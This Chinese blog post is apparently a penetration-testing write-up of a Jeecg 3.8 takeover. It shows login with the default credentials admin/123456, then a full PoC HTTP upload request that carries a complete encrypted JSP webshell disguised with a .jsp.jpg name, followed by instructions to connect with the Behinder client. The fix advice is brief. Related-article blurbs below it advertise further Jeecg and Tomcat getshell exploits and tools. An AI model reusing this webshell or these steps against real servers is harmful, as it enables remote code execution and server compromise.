Jeecg弱口令后台上传getShell渗透测试

最新推荐文章于 2025-03-26 17:37:51 发布
最新推荐文章于 2025-03-26 17:37:51 发布
阅读量4k 收藏 2
点赞数 1
分类专栏: 渗透测试 文章标签: 渗透测试 信息安全 数据安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kelenwait/article/details/118358595
版权
Jeecg是一款基于代码生成器的智能开发平台。本文揭示了其3.8版本中存在的安全漏洞,包括通过弱口令登录后利用特定URL进行文件上传攻击的方法,并提供了一个PoC示例。此外,还提出了修改默认密码和限制文件上传类型的修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

Jeecg(J2EE Code Generation)是一款基于代码生成器JEE的智能开发平台。引领新的开发模式(Online Coding->代码生成器->手工MERGE智能开发),可以帮助解决Java项目90%的重复工作,让开发更多关注业务逻辑。既能快速提高开发效率,帮助公司节省人力成本,同时又不失灵活性。

影响版本

jeecg v_3.8

漏洞复现

1.使用弱口令登录系统 admin/123456

2.进入后台后访问url 上传文件(绕过)

/jeecgFormDemoController.do?commonUpload

3.拦截修改文件名后发送,查看响应返回了上传的jsp路径

poc

POST /cgUploadController.do?ajaxSaveFile&sessionId=55F38FB8EA964ABD8CB45203CACB5419 HTTP/1.1
Host: xxxx
Content-Length: 1064
Origin: http://xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----------gL6ae0GI3gL6KM7cH2GI3Ij5Ef1cH2
Accept: */*
X-Requested-With: ShockwaveFlash/34.0.0.164
Referer: http://xxxx/systemController.do?commonUpload&_=1625019692746
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JEECGINDEXSTYLE=hplus; JSESSIONID=55F38FB8EA964ABD8CB45203CACB5419; ZINDEXNUMBER=2040
Connection: close

------------gL6ae0GI3gL6KM7cH2GI3Ij5Ef1cH2
Content-Disposition: form-data; name="Filename"

bingxie.jsp.jpg
------------gL6ae0GI3gL6KM7cH2GI3Ij5Ef1cH2
Content-Disposition: form-data; name="documentTitle"

blank
------------gL6ae0GI3gL6KM7cH2GI3Ij5Ef1cH2
Content-Disposition: form-data; name="Filedata"; filename="bingxie.jsp"
Content-Type: application/octet-stream

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------------gL6ae0GI3gL6KM7cH2GI3Ij5Ef1cH2
Content-Disposition: form-data; name="Upload"

Submit Query
------------gL6ae0GI3gL6KM7cH2GI3Ij5Ef1cH2--

4.使用冰蝎连接

修复建议

修改弱口令 升级版本 限制上传类型

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关

欢迎讨论,持续更新中,感谢关注!

Jeecg commonController 任意文件上传漏洞复现
0xSec
04-05 2143
JEECG(J2EE Code Generation) 是开源的代码生成平台,目前官方已停止维护。由于 /api 接口鉴权时未过滤路径遍历,攻击者可构造包含 ../ 的url绕过鉴权。攻击者可构造恶意请求利用 commonController 接口进行文件上传攻击实现远程代码执行,导致服务器被控。
工具分享 | jeecg- - 一款JeecgBoot综合漏洞利用工具,一键getshell
IT软件汇
09-13 1241
工具分享 | jeecg- - 一款JeecgBoot综合漏洞利用工具,一键getshell
文件上传漏洞实战getshell
zkaqlaoniao的博客
11-03 464
html,jpg,txt,png等相关后缀可以进行上传,但进行jsp等相关的后缀并不能成功。如果是白名单,返回的页面只会显示:只能上传jpg,png等相关图片的后缀,但他并没有显示,所以初步判断这里是黑名单,之后进行上传图片马,还有通过空格,.,%00截断,来进行绕过。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.之后未授权获取到注册用户的页面中,发现有一个上传图片进行上传
Jeecg漏洞总结及tscan poc分享
最新发布
YJ_12340的博客
03-26 1273
jeecgboot是一款基于代码生成器的低代码开发平台,集成完善的工作流、表单、报表、大屏的平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,成熟的微服务解决方案。 最近的攻防演练中经常遇到部署该服务的系统,而且大部分都有可利用的漏洞点,故整理一篇漏洞总结文章方便日后查阅,并且根据tscan脚本规则编写了其中一部分的poc。
Jeecg 文件上传漏洞补丁说明
JEECG官方博客
07-05 1182
产品名字:Jeecg低代码平台 问题:文件上传至tomcat内,如上传jsp文件,可能造成脚本攻击 处理情况: 已经处理 处理方案:对于正常界面操作的组件上会有上传文件类型的控制,对于模拟http请求的上传,需要在上传处理文件的接口作文件名后缀限制,拿到下面补丁包,将代码拷贝至项目src目录。 补丁包下载: 链接:https://pan.baidu.com/s/1xC3sTzpIGiGbbDB2eDJYAA 提取码:y04a ...
CVE-2023-1454 Jeecg-Boot-qurestSql-SQL-漏洞检测
m0_66376444的博客
04-11 1589
JeecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。JeecgBoot qurestSql处存在SQL注入漏洞,攻击者可以从其中获取数据库权限。访问路径:/jeecg-boot/jmreport/qurestSql。初步了解,存在这个路径可能会存在sql漏洞。出现这个说明存在漏洞。
Jeecg 任意文件下载漏洞
一个安全研究员
02-17 6076
就这?
【Weblogic】弱口令+后台getshell
时乙的博客
11-21 1734
你有你的路,我有我的路。至于适当的路,正确的路和唯一的路,这样的路并不存在。——尼采 漏洞描述 由于管理员的疏忽,导致weblogic后台管理页面为默认密码或者是弱口令,使得不怀好意的人可以通过破解直接进入后台管理页面。 环境搭建 weblogic使用vulhub搭建 用户名:weblogic 密码:aR3ewO0x 漏洞复现 访问登录页面,登录进入后台管理页面 点击部署->安装 本地制作恶意war包 点击 上载文件 进行上传 选择制作好的war包 点...
Tomcat7+ 弱口令 +后台getshell漏洞
m0_52701599的博客
02-17 781
Tomcat7+ 弱口令 && 后台getshell漏洞
Tomcat7+ 弱口令 && 后台getshell漏洞
weixin_45653478的博客
05-11 1240
Tomcat 是一个流行的开源Web应用服务器,用于部署和运行Java Web应用程序。Tomcat 7+ 版本中存在一个安全隐患,即默认的管理员密码可能较弱或者未被修改,攻击者可以利用这一漏洞登录到Tomcat的管理后台,并上传恶意的WAR包来执行任意代码。
【 漏洞复现 】Tomcat 后台弱口令部署war包 getshell
qq_48368964的博客
08-06 830
在tomcat8环境下默认进入后台的密码为 tomcat/tomcat,未修改造成未授权即可进入后台,或者管理员把密码设置成弱口令
渗透测试弱口令字典,密码爆破字典
03-19
渗透测试弱口令字典,密码爆破字典
Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)
qq_27536045的博客
04-04 5484
原创文章创作不易,个人博客charis3306.top。
JEECG-BOOT存在SQL注入漏洞[附POC]
Liyu_6618的博客
02-01 2369
JEECG-BOOT存在SQL注入漏洞[附POC]
Jeecg-Boot 存在前台SQL注入漏洞(CVE-2023-1454)
nnn2188185的博客
04-10 6768
jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入。
jeecg3.5的一个bug
weixin_34309543的博客
04-21 208
2019独角兽企业重金招聘Python工程师标准>>> ...
Jeecg-Boot 存在前台SQL注入漏洞【CVE-2023-1454】
holyxp的博客
07-02 5480
eecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE, 帮助Java项目解决70%的重复工作,让开发更多关注业务,既能快速提高效率,节省研发成本,同时又不失灵活性!
tomcat8弱口令后台get
12-30
### Tomcat 8弱口令漏洞及其防护措施 对于Tomcat 8中存在的弱口令问题,这可能导致未经授权的用户获取管理权限并执行恶意操作。为了防止这种情况发生,建议采取一系列的安全配置来增强系统的安全性。 #### 配置强密码策略 设置复杂的管理员账户密码非常重要。应启用Tomcat Manager应用中的身份验证机制,并确保所使用的用户名和密码遵循复杂度要求,比如长度至少为8个字符以上,包含大小写字母、数字及特殊符号等[^1]。 ```xml <tomcat-users> <role rolename="manager-gui"/> <user username="admin" password="{SHA}d033e22ae348aeb5660fc2140aec35850c4da997" roles="manager-gui"/> </tomcat-users> ``` 上述XML片段展示了如何定义具有更强哈希算法保护(如SHA)的用户凭证。请注意,在实际部署环境中应当替换掉示例中的`username`和`password`字段值以适应具体需求。 #### 禁止未授权访问Manager App 默认情况下,任何能够猜测到URL路径的人都可以尝试登录Tomcat Manager应用程序。因此,除了加强认证外还需要限制哪些IP地址允许连接此接口: 编辑`${CATALINA_HOME}/webapps/manager/META-INF/context.xml`文件加入如下内容: ```xml <Context antiResourceLocking="false" privileged="true"> <!-- Only allow localhost to access the manager application --> <Valve className="org.apache.catalina.valves.RemoteAddrValve" allow="127\.\d+\.\d+\.\d+|::1|0:0:0:0:0:0:0:1" /> </Context> ``` 这段代码会阻止除本地主机之外的所有设备直接请求Manager页面,从而减少了潜在攻击面。 #### 关闭不必要的HTTP方法支持 针对通过GET方式非法进入后台的问题,可以通过调整Web服务器的行为模式加以解决——即禁用某些不安全的操作命令。修改全局配置文件 `${CATALINA_BASE}/conf/web.xml` 中关于<servlet>标签内的部分参数即可实现这一目标: ```xml <!-- Disable TRACE HTTP method globally across all web applications --> <servlet> ... <init-param> <param-name>readonly</param-name> <param-value>true</param-value> </init-param> ... </servlet> <!-- Remove unnecessary methods like PUT, DELETE etc., from being processed by default servlet --> <servlet-mapping> <servlet-name>default</servlet-name> <url-pattern>/</url-pattern> </servlet-mapping> <security-constraint> <web-resource-collection> <web-resource-name>Disable Trace</web-resource-name> <url-pattern>/</url-pattern> <http-method>TRACE</http-method> </web-resource-collection> <auth-constraint/> </security-constraint> ``` 这些更改将有效地屏蔽那些可能被利用发起跨站跟踪(CST)攻击或其他形式威胁的方法调用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值